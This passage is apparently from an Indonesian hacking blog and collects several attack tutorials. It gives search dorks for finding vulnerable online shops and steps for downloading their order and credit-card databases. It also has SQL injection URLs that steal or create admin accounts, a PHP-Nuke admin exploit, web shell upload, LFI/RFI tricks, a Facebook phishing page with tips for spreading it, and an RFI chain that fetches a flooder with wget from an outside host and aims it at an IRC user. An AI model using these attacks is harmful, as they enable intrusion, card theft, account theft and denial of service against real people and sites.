www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%20select%20fldauto,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template=order.log

13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

.::Note!::..
I DONT TAKE ANY RESPONSIBLE FOR ANYTING... U TAKE UR OWN RISK..!!!

Hacking CMS Lokomedia

2011-01-11T10:17:00.001+07:00

CMS Lokomedia atau bisa juga disebut dengan Lokomedia CMS, ada juga saya dengar orang-orang suku maya menyebutnya dengan Suka CMS, CMS Lokomedia ini adalah pemprograman web content management system (CMS) berbasis PHP dan MySQL. CMS ini murni buatan anak bangsa Indonesia, buatan Mas Lukmanul Hakim yang ditulis dan diabadikan dalam buku cetakkan dari Lokomedia yang akhirnya menjadi nama dari CMS ini.
ok langsung aja ya
pada google ketik dork :
Code:

inurl:semua-berita.html

pilih web yg akan di eksekusi
setelah dapat web yg akan di eksekusi cari login adminnya
dengan menambahkan /adminweb

contoh :
www.target.com/adminweb

coba masukkan username & password default'a
username : admin
password : admin

ingat tidak semua user dan password'a default
ok next
setelah masuk pada panel adminnya , kita bisa melihat semua isi dalam web tersebut
nah udah masuk mubajir kalo di diemin aja kn
cari menu download pada panel domain tersebut , terus tambah download untuk menanam shell
setelah upload shell berhasil
lalu pada browser ketikkan
Code:

http://target.com/files/namashell.php

ok selesai ,
sudah masuk dalam web'a kn
sekarang bebas mau di apain tuh web'a

note
kebanyakan yg menggunakan CMS ini adalah web indonesia
Cintai produksi dalem negeri

sumber : http://www.indonesianhacker.or.id/threads/6351-Hacking-cms-lokomedia
author : shadowsmaker

Code Sites Negara-negara

2011-01-10T21:18:00.001+07:00

semoga bermanfaat lah

Afghanistan --> AF
Albania --> AL
Algeria --> DZ
American Samoa --> AS
Andorra --> AD
Angola --> AO
Anguilla --> AI
Antarctica --> AQ
Antigua and Barbuda --> AG
Argentina --> AR
Armenia --> AM
Aruba --> AW
Australia --> AU
Austria --> AT
Azerbaijan --> AZ
Bahamas --> BS
Bahrain --> BH
Bangladesh --> BD
Barbados --> BB
Belarus --> BY
Belgium --> BE
Belize --> BZ
Benin --> BJ
Bermuda --> BM
Bhutan --> BT
Bolivia --> BO
Bosnia and Herzegovina --> BA
Botswana --> BW
Bouvet Island --> BV
Brazil --> BR
British Indian Ocean Territory --> IO
Brunei Darussalam --> BN
Bulgaria --> BG
Burkina Faso --> BF
Burundi --> BI
Cambodia --> KH
Cameroon --> CM
Canada --> CA
Cape Verde --> CV
Cayman Islands --> KY
Central African Republic --> CF
Chad --> TD
Chile --> CL
China --> CN
Christmas Island --> CX
Cocos (Keeling) Islands --> CC
Colombia --> CO
Comoros --> KM
Congo --> CG
Congo, Democratic Republic --> CD
Cook Islands --> CK
Costa Rica --> CR
Cote d'Ivoire --> CI
Croatia --> HR
Cyprus --> CY
Czech Republic --> CZ
Denmark --> DK
Djibouti --> DJ
Dominica --> DM
Dominican Republic --> DO
East Timor --> TL
Ecuador --> EC
Egypt --> EG
El Salvador --> SV
Equatorial Guinea --> GQ
Eritrea --> ER
Estonia --> EE
Ethiopia --> ET
Falkland Islands (Malvinas) --> FK
Faroe Islands --> FO
Fiji --> FJ
Finland --> FI
France --> FR
French Guiana --> GF
French Polynesia --> PF
French Southern Territories --> TF
Gabon --> GA
Gambia --> GM
Georgia --> GE
Germany --> DE
Ghana --> GH
Gibraltar --> GI
Greece --> GR
Greenland --> GL
Grenada --> GD
Guadeloupe --> GP
Guam --> GU
Guatemala --> GT
Guinea --> GN
Guinea-Bissau --> GW
Guyana --> GY
Haiti --> HT
Heard and McDonald Islands --> HM
Honduras --> HN
Hong Kong --> HK
Hungary --> HU
Iceland --> IS
India --> IN
Indonesia --> ID
Iraq --> IQ
Ireland --> IE
Israe -->l IL
Italy --> IT
Jamaica --> JM
Japan --> JP
Jordan --> JO
Kazakhstan --> KZ
Kenya --> KE
Kiribati --> KI
Kuwait --> KW
Kyrgyzstan --> KG
Lao People's Democratic Republic --> LA
Latvia --> LV
Lebanon --> LB
Lesotho --> LS
Liberia --> LR
Libya --> LY
Liechtenstein --> LI
Lithuania --> LT
Luxembourg --> LU
Macau --> MO
Macedonia --> MK
Madagascar --> MG
Malawi --> MW
Malaysia --> MY
Maldives --> MV
Mali --> ML
Malta --> MT
Marshall Islands --> MH
Martinique --> MQ
Mauritania --> MR
Mauritius --> MU
Mayotte --> YT
Mexico --> MX
Micronesia --> FM
Moldova --> MD
Monaco --> MC
Mongolia --> MN
Montserrat --> MS
Morocco --> MA
Mozambique --> MZ
Namibia --> NA
Nauru --> NR
Nepal --> NP
Netherlands --> NL
Netherlands Antilles --> AN
New Caledonia --> NC
New Zealand --> NZ
Nicaragua --> NI
Niger --> NE
Nigeria --> NG
Niue --> NU
Norfolk Island --> NF
Northern Mariana Islands --> MP
Norway --> NO
Oman --> OM
Pakistan --> PK
Palau --> PW
Palestinian Territory --> PS
Panama --> PA
Papua New Guinea --> PG
Paraguay --> PY
Peru --> PE
Philippines --> PH
Pitcairn --> PN
Poland --> PL
Portugal --> PT
Puerto Rico --> PR
Qatar --> QA
Reunion --> RE
Romania --> RO
Russian Federation --> RU
Rwanda --> RW
Saint Kitts and Nevis --> KN
Saint Lucia --> LC
Saint Vincent and the Grenadines --> VC
Samoa --> WS
San Marino --> SM
Sao Tome and Principe --> ST
Saudi Arabia --> SA
Senegal --> SN
Serbia and Montenegro --> CS
Seychelles --> SC
Sierra Leone --> SL
Singapore --> SG
Slovakia --> SK
Slovenia --> SI
Solomon Islands --> SB
Somalia --> SO
South Africa --> ZA
South Georgia and The South Sandwich Islands --> GS
South Korea --> KR
Spain --> ES
Sri Lanka --> LK
St. Helena --> SH
St. Pierre and Miquelon --> PM
Suriname --> SR
Svalbard and Jan Mayen Islands --> SJ
Swaziland --> SZ
Sweden --> SE
Switzerland --> CH
Taiwan --> TW
Tajikistan --> TJ
Tanzania --> TZ
Thailand --> TH
Togo --> TG
Tokelau --> TK
Tonga --> TO
Trinidad and Tobago --> TT
Tunisia --> TN
Turkey --> TR
Turkmenistan --> TM
Turks and Caicos Islands --> TC
Tuvalu --> TV
Uganda --> UG
Ukraine --> UA
United Arab Emirates --> AE
United Kingdom --> GB
United States --> US
United States Minor Outlying Islands --> UM
Uruguay --> UY
Uzbekistan --> UZ
Vanuatu --> VU
Vatican --> VA
Venezuela --> VE
Viet Nam --> VN
Virgin Islands (British) --> VG
Virgin Islands (U.S.) --> VI
Wallis and Futuna Islands --> WF
Western Sahara --> EH
Yemen --> YE
Zambia --> ZM
Zimbabwe --> ZW

Deface Site PhP nuke

2011-01-10T19:48:00.000+07:00

Langsung aj boss…

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemu targetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya…

Happy Hacking..

Tutor Singkat LFI dan RFI

2011-01-10T19:04:00.000+07:00

beli ciki sama dot
cekidot :

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:
include "../$_GET[imagefile]";
?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.

nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target :lol:tapi seandainya terdapat error seperti di bawah ini:Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti iniCode:Code:include($_GET[imagefile].".php");?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.

Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

Fake Login Facebook. (hacking)

2011-01-10T16:53:00.001+07:00

ketemu lagi dengan saya yang imut imut ga imut. yang ga imut tapi imut. uakakaka.
ini jangan disalah gunakan ya ? oke coy. eh follow dulu aja blog saya. yang ga follow ga manfaat lohh. zzz
langsung aja gan. dah cape ngetik. 3 baris juga . wew.

1. silahkan anda daftar di http://www.700megs.com
mengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
ukuran cuma 9kb.

4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.

5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2...

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini

kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh...silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . .

eh ini blum beres tar ada tips lagi. tar baca aja. yang penting follow dulu aja blog nya :D.

Tutorial Serangan DDOS

2011-01-10T16:08:00.000+07:00

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/padanghackerscrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/padanghackerscrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://www.freewebs.com/padanghackers/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/padanghackerscrew/sql.htm?&cmd=wget http://www.freewebs.com/padanghackers/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/padanghackerscrew/sql.htm?&cmd=gcc -o /var/tmp/padanghackers /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/padanghackerscrew/sql.htm?&cmd=/var/tmp/./padanghackers ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/padanghackerscrew/sql.htm?&cmd=/var/tmp/./padanghackers 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet.

Google Dork

2011-01-10T13:17:00.002+07:00

inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"

inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys"

inurl:".php?categoryid="
inurl:".php?categoryid=" intext:"View cart"
inurl:".php?categoryid=" intext:"Buy Now"
inurl:".php?categoryid=" intext:"add to cart"
inurl:".php?categoryid=" intext:"shopping"
inurl:".php?categoryid=" intext:"boutique"
inurl:".php?categoryid=" intext:"/store/"
inurl:".php?categoryid=" intext:"/shop/"
inurl:".php?categoryid=" intext:"Toys"

inurl:".php?pid="
inurl:".php?pid=" intext:"shopping"
inurl:".php?pid=" intext:"add to cart"
inurl:".php?pid=" intext:"Buy Now"
inurl:".php?pid=" intext:"View cart"
inurl:".php?pid=" intext:"boutique"
inurl:".php?pid=" intext:"/store/"
inurl:".php?pid=" intext:"/shop/"
inurl:".php?pid=" intext:"toys"

inurl:".php?prodid=
inurl:".php?prodid=" intext:"shopping"
inurl:".php?prodid=" intext:"add to cart"
inurl:".php?prodid=" intext:"Buy Now"
inurl:".php?prodid=" intext:"View cart"
inurl:".php?prodid=" intext:"boutique"
inurl:".php?prodid=" intext:"/store/"
inurl:".php?prodid=" intext:"/shop/"
inurl:".php?prodid=" intext:"toys"

inurl:".php?productid='
inurl:".php?productid=" intext:"shopping"
inurl:".php?productid=" intext:"add to cart"
inurl:".php?productid=" intext:"Buy Now"
inurl:".php?productid=" intext:"View cart"
inurl:".php?productid=" intext:"boutique"
inurl:".php?productid=" intext:"/store/"
inurl:".php?productid=" intext:"/shop/"
inurl:".php?productid=" intext:"Toys"

inurl:".php?product="
inurl:".php?product=" intext:"shopping"
inurl:".php?product=" intext:"add to cart"
inurl:".php?product=" intext:"Buy Now"
inurl:".php?product=" intext:"View cart"
inurl:".php?product=" intext:"boutique"
inurl:".php?product=" intext:"/store/"
inurl:".php?product=" intext:"/shop/"
inurl:".php?product=" intext:"toys"
inurl:".php?product=" intext:"DVD"

inurl:".php?products="
inurl:".php?products=" intext:"shopping"
inurl:".php?products=" intext:"add to cart"
inurl:".php?products=" intext:"Buy Now"
inurl:".php?products=" intext:"View cart"
inurl:".php?products=" intext:"boutique"
inurl:".php?products=" intext:"/store/"
inurl:".php?products=" intext:"/shop/"
inurl:".php?products=" intext:"toys"
inurl:".php?products=" intext:"DVD"

inurl:".php?proid="
inurl:".php?proid=" intext:"shopping"
inurl:".php?proid=" intext:"add to cart"
inurl:".php?proid=" intext:"Buy Now"
inurl:".php?proid=" intext:"View cart"
inurl:".php?proid=" intext:"boutique"
inurl:".php?proid=" intext:"/store/"
inurl:".php?proid=" intext:"/shop/"
inurl:".php?proid=" intext:"toys"

inurl:".php?shopid="
inurl:".php?shopid=" intext:"shopping"
inurl:".php?shopid=" intext:"add to cart"
inurl:".php?shopid=" intext:"Buy Now"
inurl:".php?shopid=" intext:"View cart"
inurl:".php?shopid=" intext:"boutique"
inurl:".php?shopid=" intext:"/store/"
inurl:".php?shopid=" intext:"/shop/"
inurl:".php?shopid=" intext:"Toys"

inurl:".php?itemid="
inurl:".php?itemid=" intext:"shopping"
inurl:".php?itemid=" intext:"add to cart"
inurl:".php?itemid=" intext:"Buy Now"
inurl:".php?itemid=" intext:"View cart"
inurl:".php?itemid=" intext:"boutique"
inurl:".php?itemid=" intext:"/shop/"
inurl:".php?itemid=" intext:"/store/"
inurl:".php?itemid=" intext:"Toys"

inurl:".php?orderid="
inurl:".php?orderid=" intext:"shopping"
inurl:".php?orderid=" intext:"add to cart"
inurl:".php?orderid=" intext:"Buy Now"
inurl:".php?orderid=" intext:"View cart"
inurl:".php?orderid=" intext:"boutique"
inurl:".php?orderid=" intext:"/shop/"
inurl:".php?orderid=" intext:"/store/"
inurl:".php?orderid=" intext:"Toys"

inurl:".php?catalogId="
inurl:".php?catalogId=" intext:"shopping"
inurl:".php?catalogId=" intext:"add to cart"
inurl:".php?catalogId=" intext:"Buy Now"
inurl:".php?catalogId=" intext:"View cart"
inurl:".php?catalogId=" intext:"boutique"
inurl:".php?catalogId=" intext:"/shop/"
inurl:".php?catalogId=" intext:"/store/"
inurl:".php?catalogId=" intext:"Toys"

inurl:".php?aid="
inurl:".php?aid=" intext:"shopping"
inurl:".php?aid=" intext:"add to cart"
inurl:".php?aid=" intext:"Buy Now"
inurl:".php?aid=" intext:"View cart"
inurl:".php?aid=" intext:"boutique"
inurl:".php?aid=" intext:"/shop/"
inurl:".php?aid=" intext:"/store/"
inurl:".php?aid=" intext:"toys"

inurl:".php?artid="
inurl:".php?artid=" intext:"shopping"
inurl:".php?artid=" intext:"add to cart"
inurl:".php?artid=" intext:"Buy Now"
inurl:".php?artid=" intext:"View cart"
inurl:".php?artid=" intext:"boutique"
inurl:".php?artid=" intext:"/shop/"
inurl:".php?artid=" intext:"/store/"
inurl:".php?artid=" intext:"toys"

inurl:".php?articleid="
inurl:".php?articleid=" intext:"shopping"
inurl:".php?articleid=" intext:"add to cart"
inurl:".php?articleid=" intext:"Buy Now"
inurl:".php?articleid=" intext:"View cart"
inurl:".php?articleid=" intext:"boutique"
inurl:".php?articleid=" intext:"/shop/"
inurl:".php?articleid=" intext:"/store/"
inurl:".php?articleid=" intext:"toys"

###
By State

inurl:".php?id=" site:.uk
inurl:".php?id=" site:.au
inurl:".php?id=" site:.de
inurl:".php?id=" site:.at
inurl:".php?id=" site:.ca
inurl:".php?id=" site:.eu
inurl:".php?id=" site:.us
inurl:".php?id=" site:.fr

inurl:".php?cid=" site:.uk
inurl:".php?cid=" site:.au
inurl:".php?cid=" site:.de
inurl:".php?cid=" site:.at
inurl:".php?cid=" site:.ca
inurl:".php?cid=" site:.eu
inurl:".php?cid=" site:.us
inurl:".php?cid=" site:.fr

inurl:".php?catid=" site:.uk
inurl:".php?catid=" site:.au
inurl:".php?catid=" site:.de
inurl:".php?catid=" site:.at
inurl:".php?catid=" site:.ca
inurl:".php?catid=" site:.eu
inurl:".php?catid=" site:.us
inurl:".php?catid=" site:.fr

inurl:".php?categoryid=" site:.uk
inurl:".php?categoryid=" site:.au
inurl:".php?categoryid=" site:.de
inurl:".php?categoryid=" site:.at
inurl:".php?categoryid=" site:.ca
inurl:".php?categoryid=" site:.eu
inurl:".php?categoryid=" site:.us
inurl:".php?categoryid=" site:.fr

inurl:".php?pid=" site:.uk
inurl:".php?pid=" site:.au
inurl:".php?pid=" site:.de
inurl:".php?pid=" site:.at
inurl:".php?pid=" site:.ca
inurl:".php?pid=" site:.eu
inurl:".php?pid=" site:.us
inurl:".php?pid=" site:.fr

inurl:".php?prodid=" site:.uk
inurl:".php?prodid=" site:.au
inurl:".php?prodid=" site:.de
inurl:".php?prodid=" site:.at
inurl:".php?prodid=" site:.ca
inurl:".php?prodid=" site:.eu
inurl:".php?prodid=" site:.us
inurl:".php?prodid=" site:.fr

inurl:".php?productid=" site:.uk
inurl:".php?productid=" site:.au
inurl:".php?productid=" site:.de
inurl:".php?productid=" site:.at
inurl:".php?productid=" site:.ca
inurl:".php?productid=" site:.eu
inurl:".php?productid=" site:.us
inurl:".php?productid=" site:.fr

inurl:".php?shopid=" site:.uk
inurl:".php?shopid=" site:.ca
inurl:".php?shopid=" site:.at
inurl:".php?shopid=" site:.au
inurl:".php?shopid=" site:.de
inurl:".php?shopid=" site:.eu
inurl:".php?shopid=" site:.us
inurl:".php?shopid=" site:.fr

inurl:".php?itemid=" site:.uk
inurl:".php?itemid=" site:.ca
inurl:".php?itemid=" site:.at
inurl:".php?itemid=" site:.au
inurl:".php?itemid=" site:.de
inurl:".php?itemid=" site:.eu
inurl:".php?itemid=" site:.us
inurl:".php?itemid=" site:.fr

inurl:".php?orderid=" site:.uk
inurl:".php?orderid=" site:.ca
inurl:".php?orderid=" site:.at
inurl:".php?orderid=" site:.au
inurl:".php?orderid=" site:.de
inurl:".php?orderid=" site:.eu
inurl:".php?orderid=" site:.us
inurl:".php?orderid=" site:.fr

inurl:".php?catalogId=" site:.uk
inurl:".php?catalogId=" site:.ca
inurl:".php?catalogId=" site:.at
inurl:".php?catalogId=" site:.au
inurl:".php?catalogId=" site:.de
inurl:".php?catalogId=" site:.eu
inurl:".php?catalogId=" site:.us
inurl:".php?catalogId=" site:.fr

inurl:".php?aid=" site:.uk
inurl:".php?aid=" site:.ca
inurl:".php?aid=" site:.at
inurl:".php?aid=" site:.au
inurl:".php?aid=" site:.de
inurl:".php?aid=" site:.eu
inurl:".php?aid=" site:.us
inurl:".php?aid=" site:.fr

inurl:".php?artid=" site:.uk
inurl:".php?artid=" site:.ca
inurl:".php?artid=" site:.at
inurl:".php?artid=" site:.au
inurl:".php?artid=" site:.de
inurl:".php?artid=" site:.eu
inurl:".php?artid=" site:.us
inurl:".php?artid=" site:.fr

inurl:".php?articleid=" site:.uk
inurl:".php?articleid=" site:.ca
inurl:".php?articleid=" site:.at
inurl:".php?articleid=" site:.au
inurl:".php?articleid=" site:.de
inurl:".php?articleid=" site:.eu
